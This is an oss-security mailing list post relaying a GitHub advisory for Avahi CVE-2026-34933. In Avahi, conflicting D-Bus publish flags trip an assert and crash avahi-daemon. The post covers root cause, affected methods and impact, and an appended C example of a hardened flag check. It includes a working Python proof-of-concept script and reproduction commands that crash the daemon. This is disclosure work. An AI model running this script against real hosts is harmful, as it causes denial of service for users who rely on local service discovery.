Message-ID: <36063a73-4e8a-4e9e-9385-39e908d539a0@oracle.com>
Date: Sat, 11 Apr 2026 09:56:29 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: Avahi: Reachable assertion in
 transport_flags_from_domain (CVE-2026-34933)

https://github.com/avahi/avahi/security/advisories/GHSA-w65r-6gxh-vhvc advises:
> Reachable assertion in transport_flags_from_domain (CVE-2026-34933)
> 
> Moderate
> evverx published GHSA-w65r-6gxh-vhvc Apr 1, 2026
> 
> Affected versions: <=v0.9-rc3
> Patched versions:    v0.9-rc4
> 
> Description
> -----------
> In all versions up to and including 0.8 and 0.9-rc3, any unprivileged local
> user can crash avahi-daemon by sending a single D-Bus method call with
> conflicting publish flags.
> 
> The AVAHI_PUBLISH_USE_MULTICAST (0x100) and AVAHI_PUBLISH_USE_WIDE_AREA (0x80)
> flags are individually accepted by the AVAHI_FLAGS_VALID() validation macro at
> entry.c:201-209 (for AddRecord) and entry.c:593-597 (for AddService), since
> both are listed in the allowed flags bitmask. However, these flags are mutually
> exclusive, and the function transport_flags_from_domain() at entry.c:57 enforces
> this exclusivity with an assert():
> 
> static void transport_flags_from_domain(AvahiServer *s, AvahiPublishFlags *flags, const char *domain) {
>     assert(flags);
>     assert(domain);
> 
>     assert(!((*flags & AVAHI_PUBLISH_USE_MULTICAST) && (*flags & AVAHI_PUBLISH_USE_WIDE_AREA)));
>     // ...
> }
> 
> When both flags are set simultaneously (flags = 0x180), the assertion fails,
> causing the daemon to abort with SIGABRT. The D-Bus system bus policy
> (avahi-dbus.conf) allows any local user to call EntryGroupNew and AddService
> without restrictions.
> 
> Root cause
> ----------
> The flags validation (AVAHI_FLAGS_VALID) and the mutual exclusivity check
> (assert in transport_flags_from_domain) are performed at different layers
> with no coordination:
> 
>  1. AVAHI_FLAGS_VALID(flags, mask) checks !(flags & ~mask) -- it verifies that
>     no unknown bits are set, but does not check for mutually exclusive
>     combinations.
>  2. transport_flags_from_domain() enforces mutual exclusivity via assert(),
>     which is a fatal operation in a production daemon.
> 
> Affected D-Bus methods
> ----------------------
> The following D-Bus methods on org.freedesktop.Avahi.EntryGroup accept a flags
> parameter that reaches the vulnerable function:
> 
> Method            D-Bus handler            Core function
> AddService        dbus-entry-group.c:166   server_add_service_strlst_nocopy()
>                                            -> transport_flags_from_domain()
> AddServiceSubtype dbus-entry-group.c:213   server_add_service_strlst_nocopy()
>                                            -> transport_flags_from_domain()
> AddAddress        dbus-entry-group.c:280   avahi_server_add_address()
>                                            -> transport_flags_from_domain()
> AddRecord         dbus-entry-group.c:311   avahi_server_add()
>                                            -> server_add_internal()
>                                            -> transport_flags_from_domain()
> UpdateServiceTxt  dbus-entry-group.c:370   server_update_service_txt_strlst_nocopy()
>                                            -> transport_flags_from_domain()
> 
> Proof of Concept
> ----------------
> 
> #!/usr/bin/env python3
> """Any local unprivileged user can crash avahi-daemon with this script."""
> import dbus
> 
> AVAHI_PUBLISH_USE_WIDE_AREA = 128   # 0x80
> AVAHI_PUBLISH_USE_MULTICAST = 256   # 0x100
> CONFLICTING_FLAGS = AVAHI_PUBLISH_USE_WIDE_AREA | AVAHI_PUBLISH_USE_MULTICAST
> 
> bus = dbus.SystemBus()
> server = dbus.Interface(
>     bus.get_object('org.freedesktop.Avahi', '/'),
>     'org.freedesktop.Avahi.Server'
> )
> 
> # Create an entry group
> eg_path = server.EntryGroupNew()
> eg = dbus.Interface(
>     bus.get_object('org.freedesktop.Avahi', eg_path),
>     'org.freedesktop.Avahi.EntryGroup'
> )
> 
> # Trigger the crash: AddService with both MULTICAST and WIDE_AREA flags
> eg.AddService(
>     dbus.Int32(-1),                    # interface (AVAHI_IF_UNSPEC)
>     dbus.Int32(-1),                    # protocol (AVAHI_PROTO_UNSPEC)
>     dbus.UInt32(CONFLICTING_FLAGS),    # flags = 0x180 (CRASH)
>     dbus.String("PoC-Service"),        # name
>     dbus.String("_http._tcp"),         # type
>     dbus.String(""),                   # domain
>     dbus.String(""),                   # host
>     dbus.UInt16(8080),                 # port
>     dbus.Array([], signature='ay')     # TXT records
> )
> 
> Reproduction
> ------------
> 
> # On any Linux system with avahi-daemon running:
> apt install python3-dbus    # if not already installed
> python3 poc.py
> 
> # Verify crash:
> systemctl status avahi-daemon
> # Expected: "avahi-daemon.service: Main process exited, code=exited, status=134/n/a"
> 
> journalctl -u avahi-daemon -n 5
> # Expected: "entry.c:57: transport_flags_from_domain: Assertion
> #   `!((*flags & AVAHI_PUBLISH_USE_MULTICAST) && (*flags & AVAHI_PUBLISH_USE_WIDE_AREA))' failed."
> 
> Impact
> ------
> 
>  * Any unprivileged local user can immediately crash the avahi-daemon process.
>  * All mDNS/DNS-SD services on the host become unavailable.
>  * Applications relying on nss-mdns for .local hostname resolution fail.
>  * Network service discovery (printers, Chromecast, AirPlay, etc.) stops.
>  * While systemd auto-restarts the daemon, repeated crashes cause a persistent
>    DoS.
> 
> Credit
> ------
> Discovered by Guillaume MEUNIER - Head of VOC France - Orange Cyberdefense on
> 2026-03-10.
> 
> Fix
> ---
> It was addressed in <https://github.com/avahi/avahi/pull/891>.
> 
> Severity: Moderate - 5.5 / 10
> CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
> CVE ID: CVE-2026-34933
> Weakness: CWE-617


-- 
         -Alan Coopersmith-                 alan.coopersmith@...cle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris
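
The validation gap described under "Root cause" in the quoted advisory, as an added example that is not part of the advisory or of Avahi's code, and not the change made in the fix PR. The two flag values and the AVAHI_FLAGS_VALID expression are taken from the advisory text; every ex_/EX_ name and the sample inputs are hypothetical and constructed for illustration.

```c
#include <stdio.h>

/* Flag values as quoted in the advisory. */
#define AVAHI_PUBLISH_USE_WIDE_AREA 0x80u
#define AVAHI_PUBLISH_USE_MULTICAST 0x100u

/* Mask check as the advisory describes it: rejects unknown bits only. */
#define AVAHI_FLAGS_VALID(flags, mask) (!((flags) & ~(mask)))

/* Hypothetical names for this example, not Avahi identifiers. */
#define EX_OK 0
#define EX_ERR_INVALID_FLAGS (-1)
#define EX_TRANSPORT_MASK (AVAHI_PUBLISH_USE_WIDE_AREA | AVAHI_PUBLISH_USE_MULTICAST)

/* Mask-only validation: the layer that lets 0x180 through. */
int ex_validate_mask_only(unsigned flags, unsigned mask) {
    return AVAHI_FLAGS_VALID(flags, mask) ? EX_OK : EX_ERR_INVALID_FLAGS;
}

/* Hardened validation: unknown bits and conflicting transport bits are both
 * reported to the caller as an error, so no later assert() can be reached
 * with a combination the request boundary already accepted. */
int ex_validate_publish_flags(unsigned flags, unsigned mask) {
    if (!AVAHI_FLAGS_VALID(flags, mask))
        return EX_ERR_INVALID_FLAGS;
    if ((flags & EX_TRANSPORT_MASK) == EX_TRANSPORT_MASK)
        return EX_ERR_INVALID_FLAGS;
    return EX_OK;
}

int main(void) {
    /* Constructed inputs; the allowed mask here holds only the two transport bits. */
    const unsigned mask = EX_TRANSPORT_MASK;
    const unsigned samples[] = { 0x0u, 0x80u, 0x100u, 0x180u, 0x200u };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("flags=0x%03x mask-only=%d hardened=%d\n", samples[i],
               ex_validate_mask_only(samples[i], mask),
               ex_validate_publish_flags(samples[i], mask));
    return 0;
}
```

Rejecting the combination where the request is first validated turns the failure into an error reply to the caller instead of a daemon abort.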
